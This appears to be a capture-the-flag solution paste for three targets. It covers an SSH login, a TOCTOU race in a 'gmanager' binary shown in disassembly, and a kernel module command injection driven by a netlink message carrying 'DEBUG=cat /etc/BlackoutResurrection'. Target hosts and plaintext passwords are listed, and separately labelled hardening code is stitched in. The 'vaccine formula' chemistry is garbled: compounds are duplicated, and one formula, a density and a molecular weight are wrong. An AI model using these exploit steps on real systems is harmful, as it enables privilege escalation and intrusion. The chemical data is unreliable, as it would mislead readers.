Untitled

a guest
Apr 27th, 2015
free4all

#1 target
Invalid user FTcc..sb1 from 212.25.179.164
Accepted password for kermit from 212.25.179.164 port 39157 ssh

#2 target

Time-of-Check-Time-of-Use Race condition
https://capec.mitre.org/data/definitions/29.html

binary: gmanager

00000000004013f2 call sleep@PLT
00000000004013f7 lea rax, qword [ss:rbp+var_4B0]
00000000004013fe mov rsi, rax ; argument #2 for method stat
0000000000401401 mov edi, 0x401c31 ; "./lastlog", argument #1 for method stat
0000000000401406 call stat ; <----------
000000000040140b mov dword [ss:rbp+var_C], eax
000000000040140e cmp dword [ss:rbp+var_C], 0x0
0000000000401412 jne 0x4014bc

0000000000401418 mov esi, 0x2 ; argument "amode" for method access@PLT
000000000040141d mov edi, 0x401c31 ; "./lastlog", argument "path" for method access@PLT
0000000000401422 call access@PLT ; <---------- TOC (time of check)
0000000000401427 test eax, eax
0000000000401429 jne 0x4014a8

000000000040142b mov edi, 0x2 ; argument "seconds" for method sleep@PLT
0000000000401430 call sleep@PLT ; <---------- our time
0000000000401435 mov esi, 0x401c3b ; 0x401c3b (_IO_stdin_used + 0x33b), argument "mode" for method fopen@PLT
000000000040143a mov edi, 0x401c31 ; "./lastlog", argument "filename" for method fopen@PLT
000000000040143f call fopen@PLT ; <---- TOU (time of use)

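The check-then-use pattern in the gmanager listing, written in C next to a hardened form (an added example, not code from the paste or recovered from the binary). The function names, the append mode and the owner and link-count policy are assumptions made for the example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the listing: the path is resolved twice, so the object that
 * access() checked need not be the object that fopen() opens. */
FILE *open_log_racy(const char *path)
{
    if (access(path, W_OK) != 0)   /* time of check, uses the real UID */
        return NULL;
    return fopen(path, "a");       /* time of use; "a" is an assumed mode */
}

/* Hardened form: resolve the path once, refuse a symlink as the final
 * component, then validate the opened object through its descriptor. */
FILE *open_log_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return NULL;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != getuid() || st.st_nlink != 1) {
        close(fd);
        return NULL;
    }
    FILE *fp = fdopen(fd, "a");
    if (!fp) close(fd);
    return fp;
}

/* Constructed check: bit 0 = regular file accepted, bit 1 = symlink refused. */
int toctou_demo(void)
{
    char dir[] = "/tmp/toctou-XXXXXX", file[64], lnk[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/lastlog", dir);
    snprintf(lnk, sizeof lnk, "%s/lastlog.lnk", dir);
    FILE *f = fopen(file, "w");
    if (!f || fclose(f) != 0 || symlink(file, lnk) != 0) return -1;
    FILE *ok = open_log_safe(file), *bad = open_log_safe(lnk);
    int result = (ok != NULL) | ((bad == NULL) << 1);
    if (ok) fclose(ok);
    if (bad) fclose(bad);
    unlink(lnk); unlink(file); rmdir(dir);
    return result;
}
```
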
Your mission continues here:

hostname: 212.25.162.150
username: public
password: je3gi7to

Retrieve the vaccine formula contained in the file /home/monday/antigene_sbc

Congratulations!
You managed to recover in time the formula of the next-generation vaccine that Quality Cloud Farmaceutic was working on.
The substances used are listed below, with their relevant characteristics:

- Acetylsalicylic acid, molecular formula C7H6O3, molecular weight 138 amu, d=140 g/cm3
- Acetic anhydride, molecular formula C4H6O3, molecular weight 109 amu, d=1,08 g/cm3
- Acetylsalicylic acid, molecular formula C9H8O4, molecular weight=180 amu, d=1,35 g/cm3
- Acetic acid, molecular formula C2H4O2, molecular weight 60 amu, d 1,05 g/cm3

Your next target:

hostname: 212.25.162.9
username: anonymous
password: fe7feeng

Obtain the information contained in /etc/BlackoutResurrection

#3 target

lsmod
KERNEL MODULE CODE: /develop/context_switch/

#ifdef DEBUG
#define DGB_TOOL "/usr/share/nl/"

else if (!strncmp(comm,"DEBUG",5)) /* <-------- */
{
    char scpt[1024];
    memset(scpt,'\0',sizeof(scpt));
    strncat(scpt,DGB_TOOL,strlen(DGB_TOOL));
    strncat(scpt,arg,sizeof(scpt)-strlen(DGB_TOOL)-1); /* <------ */

    char *debug[] = { "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75\x64\x6f", /* '/usr/bin/sudo' */
                      "\x2d\x75", /* '-u' */
                      "\x23\x31\x33", /* '#13' */
                      "\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68", /* '/bin/bash' */
                      "\x2d\x63", /* '-c' */
                      scpt,
                      "\x4e\x55\x4c\x4c" }; /* 'NULL' */
    call_usermodehelper(debug[0], debug, NULL, UMH_WAIT_EXEC); /* <------ */

}
#endif

SEND TO KERNEL A NETLINK MESSAGE WITH A CUSTOM PAYLOAD:

memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */

nlh=(struct nlmsghdr *)malloc(
NLMSG_SPACE(MAX_PAYLOAD));
/* Fill the netlink message header */
nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
nlh->nlmsg_pid = getpid(); /* self pid */
nlh->nlmsg_flags = 0;
/* Fill in the netlink message payload */
strcpy(NLMSG_DATA(nlh), "DEBUG=cat /etc/BlackoutResurrection"); /* <------- */

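One way the DEBUG branch could validate its argument and run the tool without a shell, written as user-space C so it compiles and runs on its own (an added example, not the module's code). TOOL_NAME_MAX, the function names and the tool name memstat are hypothetical; DGB_TOOL and the sudo arguments are taken from the excerpt, and the rejected string is assumed to be the part of the message after "DEBUG=".

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DGB_TOOL "/usr/share/nl/"  /* prefix from the module excerpt */
#define TOOL_NAME_MAX 32           /* assumed limit for this example */

/* Accept only a bare tool name: non-empty, bounded, [A-Za-z0-9_-].
 * That excludes '/', '.', whitespace and every shell metacharacter. */
int debug_arg_is_valid(const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n > TOOL_NAME_MAX)
        return 0;
    return strspn(arg, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                       "0123456789_-") == n;
}

/* Build a NULL-terminated argv that runs the tool directly as uid 13,
 * with no "bash -c" in between. Returns 0 on success, -1 on rejection. */
int build_debug_argv(const char *arg, char *path, size_t len, char *argv[6])
{
    if (!debug_arg_is_valid(arg))
        return -1;
    int n = snprintf(path, len, "%s%s", DGB_TOOL, arg);
    if (n < 0 || (size_t)n >= len)
        return -1;
    argv[0] = "/usr/bin/sudo"; argv[1] = "-u"; argv[2] = "#13";
    argv[3] = "--";            argv[4] = path; argv[5] = NULL;
    return 0;
}

/* Constructed check: bit 0 = bare name accepted, bit 1 = argv as expected,
 * bit 2 = the argument carried by the paste's DEBUG message is rejected. */
int debug_demo(void)
{
    char path[64];
    char *argv[6] = { 0 };
    int r = build_debug_argv("memstat", path, sizeof path, argv) == 0;
    if (r)
        r |= (strcmp(argv[4], DGB_TOOL "memstat") == 0 && !argv[5]) << 1;
    r |= (build_debug_argv("cat /etc/BlackoutResurrection",
                           path, sizeof path, argv) == -1) << 2;
    return r;
}
```
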
Congratulations!
You managed to locate the hacker hideout where the devices containing confidential information of Quality Cloud Farmaceutic are kept.

Address: Finsbury Park, Greater London, England
Postal code: N4
Latitude: 51.5647
Longitude: -0.1064
Accuracy: 4

#END

@seeweblive NEXT TIME TRY MORE HARDER !!!! ;)


we are proud to say thanks to the underground scene from all Italy,
especially the greatest hacker aranZulla, the god of hacking emgentili,
(D)al ch(E)cco (FT), the red crew "de-micheli e andst7" for their work on fake accounts on twitter, voidsec, the backbox team.
we grew up eating bread, CLUSIT guide and blackhatz songz by astharot. We hope to see you @Smau